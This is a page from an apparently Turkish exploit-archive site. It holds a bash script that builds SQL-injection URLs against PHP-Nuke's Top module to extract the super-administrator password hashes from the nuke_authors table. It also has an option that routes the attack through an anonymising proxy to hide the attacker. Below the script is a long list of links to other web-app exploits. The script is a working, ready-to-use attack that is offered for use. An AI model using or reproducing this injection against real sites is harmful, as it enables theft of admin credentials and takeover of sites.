Eklenme Tarihi: 2008-10-20 23:00
#/bin/bash
# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke
#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!
#
URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";
echo -e "\n PHPNuke Top Module Remote SQL Injection"
echo -e " by Fabrizi Andrea 2005"
if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.site.net phpNuke\n"
exit
fi;
if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
Keywords:
Benzer Sayfalar (Similar Pages):
Bulunamadı. (not found)
Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit /
Web Apps Exploit /
Turbo Seek Null Byte Error Discloses Files to Remote Users Exploit /
Web Apps Exploit /
PHP-Nuke 7.4 Remote Privilege EscalationExploit /
Web Apps Exploit /
TorrentTrader 1.0 RC2 SQL Injection ExploitExploit /
Web Apps Exploit /
phpMyWebhosting SQL Injection Exploit
Exploit /
Web Apps Exploit /
PHP-NUKE version <= 6.9 'cid' sql injection Remote ExploitExploit /
Web Apps Exploit /
phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit /
Web Apps Exploit /
phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit /
Web Apps Exploit /
Fastgraf's whois.cgi Remote Command Execution ExploitExploit /
Web Apps Exploit /
Poll It CGI v2.0 exploitExploit /
Web Apps Exploit /
CMScore SQL Injection ExploitExploit /
Web Apps Exploit /
MyPHP Forum 1.0 SQL Injection ExploitExploit /
Web Apps Exploit /
PostNuke PostWrap Module Remote ExploitExploit /
Web Apps Exploit /
PerlDesk 1.x SQL-Injection ExploitExploit /
Web Apps Exploit /
LiteForum 2.1.1 sql injection exploitExploit /
Web Apps Exploit /
Siteman <= 1.1.10 Remote Administrative Account Addition ExploitExploit /
Web Apps Exploit /
AWStats configdir Remote Command Execution Exploit (perl code)Exploit /
Web Apps Exploit /
ITA Forum <= 1.49 SQL Injection ExploitExploit /
Web Apps Exploit /
e107 include() Remote ExploitExploit /
Web Apps Exploit /
phpMyChat 0.14.5 Remote Improper File Permissions ExploitExploit /
Web Apps Exploit /
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)Exploit /
Web Apps Exploit /
Invision Power Board v2.0.0 - 2.0.2 Sql Injection ExploitExploit /
Web Apps Exploit /
phpBB <= 2.0.10 Remote Command Execution ExploitExploit /
Web Apps Exploit /
GFHost PHP GMail Remote Command Execution ExploitExploit /
Web Apps Exploit /
TWiki 20030201 search.pm Remote Command Execution ExploitExploit /
Web Apps Exploit /
UBB.threads 6.2.*-6.3.* one char bruteforce exploitExploit /
Web Apps Exploit /
ocPortal 1.0.3 Remote File InclusionExploit /
Web Apps Exploit /
The Includer CGI <= 1.0 Remote Command Execution (new version2)Exploit /
Web Apps Exploit /
The Includer CGI <= 1.0 Remote Command Execution (new version)Exploit /
Web Apps Exploit /
phpBB <= 2.0.13 'Calendar Pro' mod Remote ExploitExploit /
Web Apps Exploit /
phpBB <= 2.0.13 'downloads.php' mod Remote Exploit